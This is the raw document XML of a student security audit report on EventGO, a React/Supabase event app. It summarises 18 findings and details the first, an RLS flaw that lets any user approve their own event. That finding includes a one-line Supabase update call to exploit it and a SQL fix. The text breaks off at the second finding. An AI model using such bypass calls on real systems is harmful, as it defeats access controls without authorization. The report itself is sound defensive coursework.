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p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="88"/>
          <w:szCs w:val="88"/>
        </w:rPr>
        <w:t xml:space="preserve">EventGO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Testing &amp; Code Audit Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2563EB" w:sz="8" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Tested by: Tahbir Moon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing Period: 28 – 30 March 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Repository: github.com/NurAhammadNiloy/EventGo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">University Project — Submitted as Part of Security Testing Module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Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">v1.0</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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">28 Mar 2026</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Tahbir Moon</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Initial draft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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">v2.0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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">30 Mar 2026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Tahbir Moon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Added SQL file analysis + pentest chains</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="340" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Introduction</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This report covers the security testing I did on the EventGO project as part of my university coursework. EventGO is an event management web app built with React on the frontend and Supabase (PostgreSQL) on the backend. My job was to look through the code, find security problems, and figure out how they could be exploited.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">I had access to the full source code including all the SQL migration files, so I was able to do a proper line-by-line review rather than just black-box testing. I tested the database security layer (Row Level Security policies, stored functions), the frontend configuration, and the overall architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In total I found 18 issues. The most serious one — which I'm calling F-01 — is that any regular user can approve their own events, completely bypassing admin review. I only found this by reading the actual SQL policy code, you wouldn't notice it from using the app normally.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">What I Tested</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">All 10 SQL migration files (phase1 through phase6_4)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Row Level Security (RLS) policies on all 7 database tables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">All stored functions / RPCs (17 functions in total)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Frontend config — index.html, vite.config.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Dependency list — package.json (30+ packages)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Repository config — .gitignore, README</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">What Was Out of Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">I did not have access to a live running version of the app, so I could not do actual live penetration testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OAuth provider configuration was not available</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">I did not test the deprecated Edge functions since they are marked as removed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="340" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Findings Overview</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Here is a quick summary of everything I found, grouped by severity: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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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Low / Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The critical finding (F-01) was the most surprising one for me — it means the whole admin moderation system can be bypassed by any user. The high severity issues are also pretty serious and two of them (F-02 and F-03) involve privacy and privilege escalation. The medium and low ones are mostly about input validation gaps and missing security headers which are common in student/indie projects.</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100"/>
        <w:gridCol w:w="1000"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="1060"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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Status</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F-01</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Any user can approve their own event</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ph1_relational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</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CWE-285</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F-02</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First admin claim is open to any user who registers first</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ph2_1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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CWE-269</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F-03</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Organizer's private email is visible to anyone who sends them a message</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ph4_messaging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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CWE-359</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F-04</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Contact messages can be sent to rejected or pending events</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ph4_messaging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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CWE-284</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F-05</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No Content Security Policy (CSP) header anywhere</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index.html + vite.config.ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>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CWE-693</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F-06</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Email validation is way too weak</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 + phase6_4</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CWE-20</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F-07</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No limit on how many replies a user can send in a conversation</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ph4_messaging</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CWE-400</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F-08</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Migration ordering creates a security gap if phase3_2 is not run</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ph3_1 vs phase3</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CWE-732</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F-09</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No character limits on text fields like event title, description, or message</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ph1 + phase3_1 + phase4</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CWE-20</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F-10</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No record of who changed admin rights or approved/rejected events</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 + phase6_3 (admin RPCs)</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CWE-778</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F-11</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Other important HTTP security headers are also missing</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index.html / hosting config</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CWE-1021</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F-12</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No CI/CD pipeline — nobody is automatically checking for security issues on new commits</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.github/ (no workflow files found)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM</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CWE-1104</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F-13</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admin_list_users() in phase4 hides disabled users from admins</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ph4_messaging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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18"/>
                <w:szCs w:val="18"/>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CWE-840</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F-14</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admin_set_user_admin() in phase4 fails if user profile row is missing</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ph4_messaging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">LOW</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CWE-754</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F-15</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is_admin() helper function does not have an explicit NULL check</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ph1_relational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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18"/>
                <w:szCs w:val="18"/>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CWE-476</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F-16</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Phone numbers are stored with no format check</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ph4 + phase6_4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">LOW</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CWE-20</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F-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Seed data uses hardcoded UUIDs that are public on GitHub</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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ph5_relational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="16A34A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>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CWE-330</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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r>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">F-18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Old deprecated server code still in the repository</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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6"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">supabase/functions/deprecated/server/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6B7280"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">INFO</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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-561</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="340" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Detailed Findings</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Below I go through each finding in detail — what I found, how it could be exploited, and how to fix it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="FEE2E2" w:val="clear"/>
        <w:spacing w:before="180" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  F-01  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[CRITICAL]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Any user can approve their own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phase1_relational_schema.sql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166–175</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CWE-285</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This was the biggest bug I found. When I read the RLS policy for updating events, I noticed the policy only checks if you are the owner of the event — it does NOT check which columns you are allowed to change. That means any logged-in user can just send an update to their own event and set status = 'approved'. The whole admin review process gets completely skipped.</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Register a normal user account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Create an event. It gets status = 'pending' by default.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Open browser console or Postman and call:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F1F5F9" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">supabase.from("events").update({ status: "approved" }).eq("id", "&lt;your_event_id&gt;")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. The RLS policy passes because you own the event.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Your event is now live and approved without any admin seeing it.</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Anyone can publish any content (fake events, spam, scam links) without admin approval. This completely breaks the moderation system.</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The fix is to either revoke UPDATE on the status column from normal users:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F1F5F9" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">REVOKE UPDATE(status) ON public.events FROM authenticated;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Or add a check in the WITH CHECK clause that prevents non-admins from changing the status value.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E5E7EB" w:sz="2" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="FEE2E2" w:val="clear"/>
        <w:spacing w:before="180" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  F-02  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DC2626"/>
